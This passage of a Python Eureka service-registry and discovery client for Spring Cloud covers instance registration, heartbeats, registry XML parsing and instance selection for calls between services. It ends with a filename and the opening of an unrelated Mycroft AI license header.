secureHealthCheckUrl="",
vipAddress="",
secureVipAddress="",
countryId=1,
dataCenterInfo=DataCenterInfo(),
hostName="",
status="", # UP, DOWN, STARTING, OUT_OF_SERVICE, UNKNOWN
overriddenstatus="", # UP, DOWN, STARTING, OUT_OF_SERVICE, UNKNOWN
leaseInfo=LeaseInfo(),
isCoordinatingDiscoveryServer=False,
metadata=None,
lastUpdatedTimestamp=0,
lastDirtyTimestamp=0,
actionType=ACTION_TYPE_ADDED, # ADDED, MODIFIED, DELETED
asgName=""):
self.instanceId = instanceId
self.sid = sid
self.app = app
self.appGroupName = appGroupName
self.ipAddr = ipAddr
self.port = port
self.securePort = securePort
self.homePageUrl = homePageUrl
self.statusPageUrl = statusPageUrl
self.healthCheckUrl = healthCheckUrl
self.secureHealthCheckUrl = secureHealthCheckUrl
self.vipAddress = vipAddress
self.secureVipAddress = secureVipAddress
self.countryId = countryId
self.dataCenterInfo = dataCenterInfo
self.hostName = hostName
self.status = status
self.overriddenstatus = overriddenstatus
self.leaseInfo = leaseInfo
self.isCoordinatingDiscoveryServer = isCoordinatingDiscoveryServer
self.metadata = metadata if metadata is not None else {}
self.lastUpdatedTimestamp = lastUpdatedTimestamp
self.lastDirtyTimestamp = lastDirtyTimestamp
self.actionType = actionType
self.asgName = asgName
########################## Basic functions #################################
####### Registry functions #########
def register(eureka_server, instance):
instance_dic = {
'instanceId': instance.instanceId,
'hostName': instance.hostName,
'app': instance.app,
'ipAddr': instance.ipAddr,
'status': instance.status,
'overriddenstatus': instance.overriddenstatus,
'port': {
'$': instance.port.port,
'@enabled': str(instance.port.enabled).lower()
},
'securePort': {
'$': instance.securePort.port,
'@enabled': str(instance.securePort.enabled).lower()
},
'countryId': instance.countryId,
'dataCenterInfo': {
'@class': instance.dataCenterInfo.className,
'name': instance.dataCenterInfo.name
},
'leaseInfo': {
'renewalIntervalInSecs': instance.leaseInfo.renewalIntervalInSecs,
'durationInSecs': instance.leaseInfo.durationInSecs,
'registrationTimestamp': instance.leaseInfo.registrationTimestamp,
'lastRenewalTimestamp': instance.leaseInfo.lastRenewalTimestamp,
'evictionTimestamp': instance.leaseInfo.evictionTimestamp,
'serviceUpTimestamp': instance.leaseInfo.serviceUpTimestamp
},
'metadata': instance.metadata,
'homePageUrl': instance.homePageUrl,
'statusPageUrl': instance.statusPageUrl,
'healthCheckUrl': instance.healthCheckUrl,
'secureHealthCheckUrl': instance.secureHealthCheckUrl,
'vipAddress': instance.vipAddress,
'secureVipAddress': instance.secureVipAddress,
'lastUpdatedTimestamp': str(instance.lastUpdatedTimestamp),
'lastDirtyTimestamp': str(instance.lastDirtyTimestamp),
'isCoordinatingDiscoveryServer': str(instance.isCoordinatingDiscoveryServer).lower()
}
_register(eureka_server, instance_dic)
def _register(eureka_server, instance_dic):
req = http_client.Request(_format_url(eureka_server) + "apps/%s" % instance_dic["app"])
req.add_header('Content-Type', 'application/json')
req.get_method = lambda: "POST"
http_client.load(req, json.dumps({"instance": instance_dic}).encode(_DEFAULT_ENCODING), timeout=_DEFAULT_TIME_OUT)
def cancel(eureka_server, app_name, instance_id):
req = http_client.Request(_format_url(eureka_server) + "apps/%s/%s" % (app_name, instance_id))
req.get_method = lambda: "DELETE"
http_client.load(req, timeout=_DEFAULT_TIME_OUT)
def send_heart_beat(eureka_server, app_name, instance_id, last_dirty_timestamp, status=INSTANCE_STATUS_UP, overriddenstatus=""):
url = _format_url(eureka_server) + "apps/%s/%s?status=%s&lastDirtyTimestamp=%s" % \
(app_name, instance_id, status, str(last_dirty_timestamp))
_logger.debug("heartbeat url::" + url)
if overriddenstatus != "":
url += "&overriddenstatus=" + overriddenstatus
req = http_client.Request(url)
req.get_method = lambda: "PUT"
http_client.load(req, timeout=_DEFAULT_TIME_OUT)
def status_update(eureka_server, app_name, instance_id, last_dirty_timestamp, status):
url = _format_url(eureka_server) + "apps/%s/%s?status=%s&lastDirtyTimestamp=%s" % \
(app_name, instance_id, status, str(last_dirty_timestamp))
req = http_client.Request(url)
req.get_method = lambda: "PUT"
http_client.load(req, timeout=_DEFAULT_TIME_OUT)
def delete_status_override(eureka_server, app_name, instance_id, last_dirty_timestamp):
url = _format_url(eureka_server) + "apps/%s/%s/status?lastDirtyTimestamp=%s" % \
(app_name, instance_id, str(last_dirty_timestamp))
req = http_client.Request(url)
req.get_method = lambda: "DELETE"
http_client.load(req, timeout=_DEFAULT_TIME_OUT)
####### Discovory functions ########
def get_applications(eureka_server, regions=[]):
return _get_applications_(_format_url(eureka_server) + "apps/", regions)
def _format_url(url):
if url.endswith('/'):
return url
else:
return url + "/"
def _get_applications_(url, regions=[]):
_url = url
if len(regions) > 0:
_url = _url + ("&" if "?" in _url else "?") + "regions=" + (",".join(regions))
txt = http_client.load(_url, timeout=_DEFAULT_TIME_OUT)
return _build_applications(ElementTree.fromstring(txt))
def _build_applications(xml_node):
if xml_node.tag != "applications":
return None
applications = Applications()
for child_node in list(xml_node):
if child_node.tag == "versions__delta" and child_node.text is not None:
applications.versions__delta = child_node.text
elif child_node.tag == "apps__hashcode" and child_node.text is not None:
applications.apps__hashcode = child_node.text
elif child_node.tag == "application":
applications.add_application(_build_application(child_node))
return applications
def _build_application(xml_node):
if xml_node.tag != "application":
return None
application = Application()
for child_node in xml_node:
if child_node.tag == "name":
application.name = child_node.text
elif child_node.tag == "instance":
application.add_instance(_build_instance(child_node))
return application
def _build_instance(xml_node):
if xml_node.tag != "instance":
return None
instance = Instance()
for child_node in xml_node:
if child_node.tag == "instanceId":
instance.instanceId = child_node.text
elif child_node.tag == "sid":
instance.sid = child_node.text
elif child_node.tag == "app":
instance.app = child_node.text
elif child_node.tag == "appGroupName":
instance.appGroupName = child_node.text
elif child_node.tag == "ipAddr":
instance.ipAddr = child_node.text
elif child_node.tag == "port":
instance.port = _build_port(child_node)
elif child_node.tag == "securePort":
instance.securePort = _build_port(child_node)
elif child_node.tag == "homePageUrl":
instance.homePageUrl = child_node.text
elif child_node.tag == "statusPageUrl":
instance.statusPageUrl = child_node.text
elif child_node.tag == "healthCheckUrl":
instance.healthCheckUrl = child_node.text
elif child_node.tag == "secureHealthCheckUrl":
instance.secureHealthCheckUrl = child_node.text
elif child_node.tag == "vipAddress":
instance.vipAddress = child_node.text
elif child_node.tag == "secureVipAddress":
instance.secureVipAddress = child_node.text
elif child_node.tag == "countryId":
instance.countryId = int(child_node.text)
elif child_node.tag == "dataCenterInfo":
instance.dataCenterInfo = DataCenterInfo(name=child_node.text, className=child_node.attrib["class"])
elif child_node.tag == "hostName":
instance.hostName = child_node.text
elif child_node.tag == "status":
instance.status = child_node.text
elif child_node.tag == "overriddenstatus":
instance.overriddenstatus = child_node.text
elif child_node.tag == "leaseInfo":
instance.leaseInfo = _build_lease_info(child_node)
elif child_node.tag == "isCoordinatingDiscoveryServer":
instance.isCoordinatingDiscoveryServer = (child_node.text == "true")
elif child_node.tag == "metadata":
instance.metadata = _build_metadata(child_node)
elif child_node.tag == "lastUpdatedTimestamp":
instance.lastUpdatedTimestamp = long(child_node.text)
elif child_node.tag == "lastDirtyTimestamp":
instance.lastDirtyTimestamp = long(child_node.text)
elif child_node.tag == "actionType":
instance.actionType = child_node.text
elif child_node.tag == "asgName":
instance.asgName = child_node.text
return instance
def _build_metadata(xml_node):
metadata = {}
for child_node in list(xml_node):
metadata[child_node.tag] = child_node.text
return metadata
def _build_lease_info(xml_node):
leaseInfo = LeaseInfo()
for child_node in list(xml_node):
if child_node.tag == "renewalIntervalInSecs":
leaseInfo.renewalIntervalInSecs = int(child_node.text)
elif child_node.tag == "durationInSecs":
leaseInfo.durationInSecs = int(child_node.text)
elif child_node.tag == "registrationTimestamp":
leaseInfo.registrationTimestamp = long(child_node.text)
elif child_node.tag == "lastRenewalTimestamp":
leaseInfo.lastRenewalTimestamp = long(child_node.text)
elif child_node.tag == "renewalTimestamp":
leaseInfo.renewalTimestamp = long(child_node.text)
elif child_node.tag == "evictionTimestamp":
leaseInfo.evictionTimestamp = long(child_node.text)
elif child_node.tag == "serviceUpTimestamp":
leaseInfo.serviceUpTimestamp = long(child_node.text)
return leaseInfo
def _build_port(xml_node):
port = PortWrapper()
port.port = int(xml_node.text)
port.enabled = (xml_node.attrib["enabled"] == "true")
return port
def get_delta(eureka_server, regions=[]):
return _get_applications_(_format_url(eureka_server) + "apps/delta", regions)
def get_vip(eureka_server, vip, regions=[]):
return _get_applications_(_format_url(eureka_server) + "vips/" + vip, regions)
def get_secure_vip(eureka_server, svip, regions=[]):
return _get_applications_(_format_url(eureka_server) + "svips/" + svip, regions)
def get_application(eureka_server, app_name):
url = _format_url(eureka_server) + "apps/" + app_name
txt = http_client.load(url, timeout=_DEFAULT_TIME_OUT)
return _build_application(ElementTree.fromstring(txt))
def get_app_instance(eureka_server, app_name, instance_id):
return _get_instance_(_format_url(eureka_server) + "apps/%s/%s" % (app_name, instance_id))
def get_instance(eureka_server, instance_id):
return _get_instance_(_format_url(eureka_server) + "instances/" + instance_id)
def _get_instance_(url):
txt = http_client.load(url, timeout=_DEFAULT_TIME_OUT)
return _build_instance(ElementTree.fromstring(txt))
def _current_time_millis():
return int(time.time() * 1000)
"""====================== Registry Client ======================================="""
class RegistryClient:
"""Eureka client for spring cloud"""
def __init__(self,
eureka_server=_DEFAULT_EUREKA_SERVER_URL,
app_name="",
instance_id="",
instance_host="",
instance_ip="",
instance_port=_DEFAULT_INSTNACE_PORT,
instance_unsecure_port_enabled=True,
instance_secure_port=_DEFAULT_INSTNACE_SECURE_PORT,
instance_secure_port_enabled=False,
countryId=1, # @deprecaded
data_center_name=_DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
renewal_interval_in_secs=_RENEWAL_INTERVAL_IN_SECS,
duration_in_secs=_DURATION_IN_SECS,
home_page_url="",
status_page_url="",
health_check_url="",
secure_health_check_url="",
vip_adr="",
secure_vip_addr="",
is_coordinating_discovery_server=False,
metadata={}):
assert eureka_server is not None and eureka_server != "", "eureka server must be specified."
assert app_name is not None and app_name != "", "application name must be specified."
assert instance_port > 0, "port is unvalid"
assert isinstance(metadata, dict), "metadata must be dict"
self.__net_lock = RLock()
self.__eureka_servers = eureka_server.split(",")
def try_to_get_client_ip(url):
if instance_host == "" and instance_ip == "":
self.__instance_host = self.__instance_ip = RegistryClient.__get_instance_ip(url)
elif instance_host != "" and instance_ip == "":
self.__instance_host = instance_host
if RegistryClient.__is_ip(instance_host):
self.__instance_ip = instance_host
else:
self.__instance_ip = RegistryClient.__get_instance_ip(url)
else:
self.__instance_host = instance_ip
self.__instance_ip = instance_ip
self.__try_all_eureka_server(try_to_get_client_ip)
mdata = {
'management.port': str(instance_port)
}
mdata.update(metadata)
self.__instance = {
'instanceId': instance_id if instance_id != "" else "%s:%s:%d" % (self.__instance_host, app_name.lower(), instance_port),
'hostName': self.__instance_host,
'app': app_name.upper(),
'ipAddr': self.__instance_ip,
'port': {
'$': instance_port,
'@enabled': str(instance_unsecure_port_enabled).lower()
},
'securePort': {
'$': instance_secure_port,
'@enabled': str(instance_secure_port_enabled).lower()
},
'countryId': countryId,
'dataCenterInfo': {
'@class': _DEFAULT_DATA_CENTER_INFO_CLASS,
'name': data_center_name
},
'leaseInfo': {
'renewalIntervalInSecs': renewal_interval_in_secs,
'durationInSecs': duration_in_secs,
'registrationTimestamp': 0,
'lastRenewalTimestamp': 0,
'evictionTimestamp': 0,
'serviceUpTimestamp': 0
},
'metadata': mdata,
'homePageUrl': RegistryClient.__format_url(home_page_url, self.__instance_host, instance_port),
'statusPageUrl': RegistryClient.__format_url(status_page_url, self.__instance_host, instance_port, "info"),
'healthCheckUrl': RegistryClient.__format_url(health_check_url, self.__instance_host, instance_port, "health"),
'secureHealthCheckUrl': secure_health_check_url,
'vipAddress': vip_adr if vip_adr != "" else app_name.lower(),
'secureVipAddress': secure_vip_addr if secure_vip_addr != "" else app_name.lower(),
'isCoordinatingDiscoveryServer': str(is_coordinating_discovery_server).lower()
}
self.__alive = False
self.__heart_beat_timer = Timer(renewal_interval_in_secs, self.__heart_beat)
self.__heart_beat_timer.daemon = True
def __try_all_eureka_server(self, fun):
with self.__net_lock:
untry_servers = self.__eureka_servers
tried_servers = []
ok = False
while len(untry_servers) > 0:
url = untry_servers[0].strip()
try:
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn("Eureka server [%s] is down, use next url to try." % url)
tried_servers.append(url)
untry_servers = untry_servers[1:]
else:
ok = True
break
if len(tried_servers) > 0:
untry_servers.extend(tried_servers)
self.__eureka_servers = untry_servers
if not ok:
raise http_client.URLError("All eureka servers are down!")
@staticmethod
def __format_url(url, host, port, defalut_ctx=""):
if url != "":
if url.startswith('http'):
_url = url
elif url.startswith('/'):
_url = 'http://%s:%d%s' % (host, port, url)
else:
_url = 'http://%s:%d/%s' % (host, port, url)
else:
_url = 'http://%s:%d/%s' % (host, port, defalut_ctx)
return _url
@staticmethod
def __is_ip(ip_str):
return re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', ip_str)
@staticmethod
def __get_instance_ip(eureka_server):
url_obj = http_client.parse_url(eureka_server)
target_ip = url_obj["host"]
target_port = url_obj["port"]
if target_port is None:
if url_obj["schema"] == "http":
target_port = 80
else:
target_port = 443
if url_obj["ipv6"] is not None:
target_ip = url_obj["ipv6"]
socket_family = socket.AF_INET6
else:
socket_family = socket.AF_INET
s = socket.socket(socket_family, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
ip = s.getsockname()[0]
s.close()
return ip
def register(self, status=INSTANCE_STATUS_UP, overriddenstatus=INSTANCE_STATUS_UNKNOWN):
self.__instance["status"] = status
self.__instance["overriddenstatus"] = overriddenstatus
self.__instance["lastUpdatedTimestamp"] = str(_current_time_millis())
self.__instance["lastDirtyTimestamp"] = str(_current_time_millis())
try:
self.__try_all_eureka_server(lambda url: _register(url, self.__instance))
except:
_logger.exception("error!")
else:
self.__alive = True
def cancel(self):
try:
self.__try_all_eureka_server(lambda url: cancel(url, self.__instance["app"], self.__instance["instanceId"]))
except:
_logger.exception("error!")
else:
self.__alive = False
def send_heart_beat(self, overridden_status=""):
try:
self.__try_all_eureka_server(lambda url: send_heart_beat(url, self.__instance["app"],
self.__instance["instanceId"], self.__instance["lastDirtyTimestamp"],
status=self.__instance["status"], overriddenstatus=overridden_status))
except:
_logger.exception("Error!")
_logger.info("Cannot send heartbeat to server, try to register")
self.register()
def status_update(self, new_status):
self.__instance["status"] = new_status
try:
self.__try_all_eureka_server(lambda url: status_update(url, self.__instance["app"], self.__instance["instanceId"],
self.__instance["lastDirtyTimestamp"], new_status))
except:
_logger.exception("error!")
def delete_status_override(self):
self.__try_all_eureka_server(lambda url: delete_status_override(
url, self.__instance["app"], self.__instance["instanceId"], self.__instance["lastDirtyTimestamp"]))
def start(self):
_logger.debug("start to registry client...")
self.register()
self.__heart_beat_timer.start()
def stop(self):
if self.__alive:
_logger.debug("stopping client...")
if self.__heart_beat_timer.isAlive():
self.__heart_beat_timer.cancel()
self.register(status=INSTANCE_STATUS_DOWN)
self.cancel()
def __heart_beat(self):
while True:
_logger.debug("sending heart beat to spring cloud server ")
self.send_heart_beat()
time.sleep(self.__instance["leaseInfo"]["renewalIntervalInSecs"])
__cache_key = "default"
__cache_registry_clients = {}
__cache_registry_clients_lock = RLock()
def init_registry_client(eureka_server=_DEFAULT_EUREKA_SERVER_URL,
app_name="",
instance_id="",
instance_host="",
instance_ip="",
instance_port=_DEFAULT_INSTNACE_PORT,
instance_unsecure_port_enabled=True,
instance_secure_port=_DEFAULT_INSTNACE_SECURE_PORT,
instance_secure_port_enabled=False,
countryId=1, # @deprecaded
data_center_name=_DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
renewal_interval_in_secs=_RENEWAL_INTERVAL_IN_SECS,
duration_in_secs=_DURATION_IN_SECS,
home_page_url="",
status_page_url="",
health_check_url="",
secure_health_check_url="",
vip_adr="",
secure_vip_addr="",
is_coordinating_discovery_server=False,
metadata={}):
with __cache_registry_clients_lock:
client = RegistryClient(eureka_server=eureka_server,
app_name=app_name,
instance_id=instance_id,
instance_host=instance_host,
instance_ip=instance_ip,
instance_port=instance_port,
instance_unsecure_port_enabled=instance_unsecure_port_enabled,
instance_secure_port=instance_secure_port,
instance_secure_port_enabled=instance_secure_port_enabled,
countryId=countryId,
data_center_name=data_center_name,
renewal_interval_in_secs=renewal_interval_in_secs,
duration_in_secs=duration_in_secs,
home_page_url=home_page_url,
status_page_url=status_page_url,
health_check_url=health_check_url,
secure_health_check_url=secure_health_check_url,
vip_adr=vip_adr,
secure_vip_addr=secure_vip_addr,
is_coordinating_discovery_server=is_coordinating_discovery_server,
metadata=metadata)
__cache_registry_clients[__cache_key] = client
client.start()
return client
def get_registry_client():
# type () -> RegistryClient
with __cache_registry_clients_lock:
if __cache_key in __cache_registry_clients:
return __cache_registry_clients[__cache_key]
else:
return None
"""======================== Cached Discovery Client ============================"""
class DiscoveryClient:
"""Discover the apps registered in spring cloud server, this class will do some cached, if you want to get the apps immediatly, use the global functions"""
def __init__(self, eureka_server, regions=None, renewal_interval_in_secs=_RENEWAL_INTERVAL_IN_SECS, ha_strategy=HA_STRATEGY_RANDOM):
assert ha_strategy in [HA_STRATEGY_RANDOM, HA_STRATEGY_STICK, HA_STRATEGY_OTHER], "do not support strategy %d " % ha_strategy
self.__eureka_servers = eureka_server.split(",")
self.__regions = regions if regions is not None else []
self.__cache_time_in_secs = renewal_interval_in_secs
self.__applications = None
self.__delta = None
self.__ha_strategy = ha_strategy
self.__ha_cache = {}
self.__timer = Timer(self.__cache_time_in_secs, self.__heartbeat)
self.__timer.daemon = True
self.__application_mth_lock = RLock()
self.__net_lock = RLock()
def __heartbeat(self):
while True:
self.__fetch_delta()
time.sleep(self.__cache_time_in_secs)
@property
def applications(self):
with self.__application_mth_lock:
if self.__applications is None:
self.__pull_full_registry()
return self.__applications
def __try_all_eureka_server(self, fun):
with self.__net_lock:
untry_servers = self.__eureka_servers
tried_servers = []
ok = False
while len(untry_servers) > 0:
url = untry_servers[0].strip()
try:
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn("Eureka server [%s] is down, use next url to try." % url)
tried_servers.append(url)
untry_servers = untry_servers[1:]
else:
ok = True
break
if len(tried_servers) > 0:
untry_servers.extend(tried_servers)
self.__eureka_servers = untry_servers
if not ok:
raise http_client.URLError("All eureka servers are down!")
def __pull_full_registry(self):
def do_pull(url): # the actual function body
self.__applications = get_applications(url, self.__regions)
self.__delta = self.__applications
self.__try_all_eureka_server(do_pull)
def __fetch_delta(self):
def do_fetch(url):
if self.__applications is None or len(self.__applications.applications) == 0:
self.__pull_full_registry()
return
delta = get_delta(url, self.__regions)
_logger.debug("delta got: v.%s::%s" % (delta.versionsDelta, delta.appsHashcode))
if self.__delta is not None \
and delta.versionsDelta == self.__delta.versionsDelta \
and delta.appsHashcode == self.__delta.appsHashcode:
return
self.__merge_delta(delta)
self.__delta = delta
if not self.__is_hash_match():
self.__pull_full_registry()
self.__try_all_eureka_server(do_fetch)
def __is_hash_match(self):
app_hash = self.__get_applications_hash()
_logger.debug("check hash, local[%s], remote[%s]" % (app_hash, self.__delta.appsHashcode))
return app_hash == self.__delta.appsHashcode
def __merge_delta(self, delta):
_logger.debug("merge delta...length of application got from delta::%d" % len(delta.applications))
for application in delta.applications:
for instance in application.instances:
_logger.debug("instance [%s] has %s" % (instance.instanceId, instance.actionType))
if instance.actionType in (ACTION_TYPE_ADDED, ACTION_TYPE_MODIFIED):
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
else:
existingApp.update_instance(instance)
elif instance.actionType == ACTION_TYPE_DELETED:
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
existingApp.remove_instance(instance)
def __get_applications_hash(self):
app_hash = ""
app_status_count = {}
for application in self.__applications.applications:
for instance in application.instances:
if instance.status not in app_status_count:
app_status_count[instance.status.upper()] = 0
app_status_count[instance.status.upper()] = app_status_count[instance.status.upper()] + 1
sorted_app_status_count = sorted(app_status_count.items(), key=lambda item: item[0])
for item in sorted_app_status_count:
app_hash = app_hash + "%s_%d_" % (item[0], item[1])
return app_hash
def walk_nodes_async(self, app_name="", service="", prefer_ip=False, prefer_https=False, walker=None, on_success=None, on_error=None):
def async_thread_target():
try:
res = self.walk_nodes(app_name=app_name, service=service, prefer_ip=prefer_ip, prefer_https=prefer_https, walker=walker)
if on_success is not None and (inspect.isfunction(on_success) or inspect.ismethod(on_success)):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (inspect.isfunction(on_error) or inspect.ismethod(on_error)):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def walk_nodes(self, app_name="", service="", prefer_ip=False, prefer_https=False, walker=None):
assert app_name is not None and app_name != "", "application_name should not be null"
assert inspect.isfunction(walker) or inspect.ismethod(walker), "walker must be a method or function"
error_nodes = []
app_name = app_name.upper()
node = self.__get_available_service(app_name)
while node is not None:
try:
url = self.__generate_service_url(node, prefer_ip, prefer_https)
if service.startswith("/"):
url = url + service[1:]
else:
url = url + service
_logger.debug("service url::" + url)
return walker(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn("do service %s in node [%s] error, use next node." % (service, node.instanceId))
error_nodes.append(node.instanceId)
node = self.__get_available_service(app_name, error_nodes)
raise http_client.URLError("Try all up instances in registry, but all fail")
def do_service_async(self, app_name="", service="", return_type="string",
prefer_ip=False, prefer_https=False,
on_success=None, on_error=None,
method="GET", headers=None,
data=None, timeout=_DEFAULT_TIME_OUT,
cafile=None, capath=None, cadefault=False, context=None):
def async_thread_target():
try:
res = self.do_service(app_name=app_name,
service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
if on_success is not None and (inspect.isfunction(on_success) or inspect.ismethod(on_success)):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (inspect.isfunction(on_error) or inspect.ismethod(on_error)):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def do_service(self, app_name="", service="", return_type="string",
prefer_ip=False, prefer_https=False,
method="GET", headers=None,
data=None, timeout=_DEFAULT_TIME_OUT,
cafile=None, capath=None, cadefault=False, context=None):
def walk_using_urllib(url):
req = http_client.Request(url)
req.get_method = lambda: method
heads = headers if headers is not None else {}
for k, v in heads.items():
req.add_header(k, v)
res_txt = http_client.load(req, data=data, timeout=timeout, cafile=cafile, capath=capath, cadefault=cadefault, context=context)
if return_type.lower() in ("json", "dict", "dictionary"):
return json.loads(res_txt)
else:
return res_txt
return self.walk_nodes(app_name, service, prefer_ip, prefer_https, walk_using_urllib)
def __get_available_service(self, application_name, ignore_instance_ids=None):
app = self.applications.get_application(application_name)
if app is None:
return None
up_instances = []
if ignore_instance_ids is None or len(ignore_instance_ids) == 0:
up_instances.extend(app.up_instances)
else:
for ins in app.up_instances:
if ins.instanceId not in ignore_instance_ids:
up_instances.append(ins)
if len(up_instances) == 0:
# no up instances
return None
elif len(up_instances) == 1:
# only one available instance, then doesn't matter which strategy is.
instance = up_instances[0]
self.__ha_cache[application_name] = instance.instanceId
return instance
def random_one(instances):
if len(instances) == 1:
idx = 0
else:
idx = random.randint(0, len(instances) - 1)
selected_instance = instances[idx]
self.__ha_cache[application_name] = selected_instance.instanceId
return selected_instance
if self.__ha_strategy == HA_STRATEGY_RANDOM:
return random_one(up_instances)
elif self.__ha_strategy == HA_STRATEGY_STICK:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
cahce_instance = app.get_instance(cache_id)
if cahce_instance is not None and cahce_instance.status == INSTANCE_STATUS_UP:
return cahce_instance
else:
return random_one(up_instances)
else:
return random_one(up_instances)
elif self.__ha_strategy == HA_STRATEGY_OTHER:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
other_instances = []
for up_instance in up_instances:
if up_instance.instanceId != cache_id:
other_instances.append(up_instance)
return random_one(other_instances)
else:
return random_one(up_instances)
else:
return None
def __generate_service_url(self, instance, prefer_ip, prefer_https):
if instance is None:
return None
schema = "http"
port = 0
if instance.port.port and not instance.securePort.enabled:
schema = "http"
port = instance.port.port
elif not instance.port.port and instance.securePort.enabled:
schema = "https"
port = instance.securePort.port
elif instance.port.port and instance.securePort.enabled:
if prefer_https:
schema = "https"
port = instance.securePort.port
else:
schema = "http"
port = instance.port.port
else:
assert False, "generate_service_url error: No port is available"
host = instance.ipAddr if prefer_ip else instance.hostName
return "%s://%s:%d/" % (schema, host, port)
def start(self):
self.__pull_full_registry()
self.__timer.start()
def stop(self):
if self.__timer.isAlive():
self.__timer.cancel()
__cache_discovery_clients = {}
__cache_discovery_clients_lock = RLock()
def init_discovery_client(eureka_server=_DEFAULT_EUREKA_SERVER_URL, regions=[], renewal_interval_in_secs=_RENEWAL_INTERVAL_IN_SECS, ha_strategy=HA_STRATEGY_RANDOM):
with __cache_discovery_clients_lock:
assert __cache_key not in __cache_discovery_clients, "Client has already been initialized."
cli = DiscoveryClient(eureka_server, regions=regions, renewal_interval_in_secs=renewal_interval_in_secs, ha_strategy=ha_strategy)
cli.start()
__cache_discovery_clients[__cache_key] = cli
return cli
def get_discovery_client():
# type: (str) -> DiscoveryClient
with __cache_discovery_clients_lock:
if __cache_key in __cache_discovery_clients:
return __cache_discovery_clients[__cache_key]
else:
return None
def init(eureka_server=_DEFAULT_EUREKA_SERVER_URL,
regions=[],
app_name="",
instance_id="",
instance_host="",
instance_ip="",
instance_port=_DEFAULT_INSTNACE_PORT,
instance_unsecure_port_enabled=True,
instance_secure_port=_DEFAULT_INSTNACE_SECURE_PORT,
instance_secure_port_enabled=False,
countryId=1, # @deprecaded
data_center_name=_DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
renewal_interval_in_secs=_RENEWAL_INTERVAL_IN_SECS,
duration_in_secs=_DURATION_IN_SECS,
home_page_url="",
status_page_url="",
health_check_url="",
secure_health_check_url="",
vip_adr="",
secure_vip_addr="",
is_coordinating_discovery_server=False,
metadata={},
ha_strategy=HA_STRATEGY_RANDOM):
registry_client = init_registry_client(eureka_server=eureka_server,
app_name=app_name,
instance_id=instance_id,
instance_host=instance_host,
instance_ip=instance_ip,
instance_port=instance_port,
instance_unsecure_port_enabled=instance_unsecure_port_enabled,
instance_secure_port=instance_secure_port,
instance_secure_port_enabled=instance_secure_port_enabled,
countryId=countryId,
data_center_name=data_center_name,
renewal_interval_in_secs=renewal_interval_in_secs,
duration_in_secs=duration_in_secs,
home_page_url=home_page_url,
status_page_url=status_page_url,
health_check_url=health_check_url,
secure_health_check_url=secure_health_check_url,
vip_adr=vip_adr,
secure_vip_addr=secure_vip_addr,
is_coordinating_discovery_server=is_coordinating_discovery_server,
metadata=metadata)
discovery_client = init_discovery_client(eureka_server,
regions=regions,
renewal_interval_in_secs=renewal_interval_in_secs,
ha_strategy=ha_strategy)
return registry_client, discovery_client
def walk_nodes_async(app_name="", service="", prefer_ip=False, prefer_https=False, walker=None, on_success=None, on_error=None):
cli = get_discovery_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
cli.walk_nodes_async(app_name=app_name, service=service,
prefer_ip=prefer_ip, prefer_https=prefer_https,
walker=walker, on_success=on_success, on_error=on_error)
def walk_nodes(app_name="", service="", prefer_ip=False, prefer_https=False, walker=None):
cli = get_discovery_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
return cli.walk_nodes(app_name=app_name, service=service,
prefer_ip=prefer_ip, prefer_https=prefer_https, walker=walker)
def do_service_async(app_name="", service="", return_type="string",
prefer_ip=False, prefer_https=False,
on_success=None, on_error=None,
method="GET", headers=None,
data=None, timeout=_DEFAULT_TIME_OUT,
cafile=None, capath=None, cadefault=False, context=None):
cli = get_discovery_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
cli.do_service_async(app_name=app_name, service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
on_success=on_success, on_error=on_error,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
def do_service(app_name="", service="", return_type="string",
prefer_ip=False, prefer_https=False,
method="GET", headers=None,
data=None, timeout=_DEFAULT_TIME_OUT,
cafile=None, capath=None, cadefault=False, context=None):
cli = get_discovery_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
return cli.do_service(app_name=app_name, service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
def stop():
register_cli = get_registry_client()
if register_cli is not None:
register_cli.stop()
discovery_client = get_discovery_client()
if discovery_client is not None:
discovery_client.stop()
@atexit.register
def _cleanup_before_exist():
if len(__cache_registry_clients) > 0:
_logger.debug("cleaning up registry clients")
for k, cli in __cache_registry_clients.items():
_logger.debug("try to stop cache registry client [%s] this will also unregister this client from the eureka server" % k)
cli.stop()
if len(__cache_discovery_clients) > 0:
_logger.debug("cleaning up discovery clients")
for k, cli in __cache_discovery_clients.items():
_logger.debug("try to stop cache discovery client [%s] this will also unregister this client from the eureka server" % k)
cli.stop()
|
__init__.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
